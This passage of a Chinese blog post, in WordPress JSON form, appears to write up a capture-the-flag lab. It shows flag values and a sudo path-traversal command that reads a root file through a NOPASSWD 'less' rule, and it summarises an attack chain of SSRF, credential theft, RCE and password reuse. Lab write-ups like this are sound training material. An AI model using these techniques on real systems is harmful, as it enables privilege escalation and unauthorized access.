lazyload-container-unload' data-fancybox='post-images' href='https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_154613_1012-1024x274.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"274\" data-original=\"https:\/\/myblog.marsrains.top\/wp-content\/uploads\/2026\/03\/ScreenShot_2026-03-26_154613_1012-1024x274.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-734\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u83b7\u53d6\u5230flag2.txt<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code><strong>flag2{7d2e4b8c1f6a39d5e0c7b2f84a16d9e3}<\/strong><\/code><\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\">flag3<\/h4>\n\n\n\n<p>\u67e5\u770bliwei\u7684\u6743\u9650\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo -l<\/code><\/pre>\n\n\n\n<p>\u53d1\u73b0\u8fd4\u56de\u7ed3\u679c\uff1a\u6307\u4ee4\u6f0f\u6d1e\u2014\u2014\u65e0\u9700\u8f93\u5165\u5bc6\u7801\u8c03\u7528sudo\u6743\u9650<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<pre class=\"wp-block-code\"><code>(ALL) NOPASSWD: \/usr\/bin\/less \/var\/log\/abyss\/*<\/code><\/pre>\n<\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>#\u5229\u7528\u6307\u4ee4\u6f0f\u6d1e\u67e5\u770b\nsudo \/usr\/bin\/less \/var\/log\/abyss\/..\/..\/..\/flag3.txt\n\n#\u8fd4\u56de\u7ed3\u679c<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><strong><code>flag3{b9c1d4e7f2a85036e1d8c3b6f4a27d5e}<\/code><\/strong><\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e09\u3001\u603b\u7ed3<\/h2>\n\n\n\n<p>\u6574\u4e2a\u9776\u573a\u6d41\u7a0b\u4e3a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>SSRF\uff08url_check.php\uff09\u2192 \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/li>\n\n\n\n<li>\u8bfb\u53d6 db.php \u2192 \u62ff\u5230\u6570\u636e\u5e93 root \u5bc6\u7801<\/li>\n\n\n\n<li>\u53d1\u73b0 admin_panel \u2192 \u7834\u89e3 token (bob) + RCE <\/li>\n\n\n\n<li>\u7528 RCE \u62ff\u5230 apache shell <\/li>\n\n\n\n<li>\u901a\u8fc7\u6570\u636e\u5e93 + \u5bc6\u7801\u91cd\u7528 \u2192 \u5207\u6362\u5230 liwei \u7528\u6237\uff08guest123\uff09<\/li>\n\n\n\n<li>\u5229\u7528 sudoers \u914d\u7f6e + less \u8def\u5f84\u7a7f\u8d8a \u2192 \u8bfb\u53d6 root flag3<\/li>\n<\/ol>\n\n\n\n<p>\u5176\u4e2d\u73af\u8282\u5c42\u5c42\u76f8\u6263\uff0c\u4ece\u76f8\u5173\u7684\u547d\u4ee4\u5c55\u793a\u51fa\u7684\u4fe1\u606f\u4e5f\u6070\u5230\u597d\u5904\u3002\u4e0d\u4f1a\u53ea\u8ba9\u5355\u4e00\u7684\u201c\u4e00\u53e5\u8bdd\u6728\u9a6c\u201d\u6216\u8005\u7b80\u5355\u7684\u7206\u7834\u7684\u547d\u4ee4\u7834\u89e3\u5bc6\u7801\uff0c\u9700\u8981\u8f83\u5f3a\u7684\u5173\u8054\u601d\u7ef4\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6838\u5fc3\u8003\u5bdf\u70b9\uff1a \u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u5148\u901a\u8fc7curl\u6536\u96c6\u8be5\u7f51\u7ad9\u7684\u57fa\u672c\u4fe1\u606f \u63d0\u53d6\u7684\u57fa\u672c\u4fe1\u606f\u53ef\u4ee5\u6c47\u603b\u4e3a\uff1a \u4e8c\u3001\u6f0f\u6d1e\u5229\u7528\u548c\u5206\u6790 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,15],"tags":[],"class_list":["post-699","post","type-post","status-publish","format-standard","hentry","category-capture-the-flag","category-15"],"_links":{"self":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts\/699","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=699"}],"version-history":[{"count":11,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts\/699\/revisions"}],"predecessor-version":[{"id":763,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=\/wp\/v2\/posts\/699\/revisions\/763"}],"wp:attachment":[{"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/myblog.marsrains.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}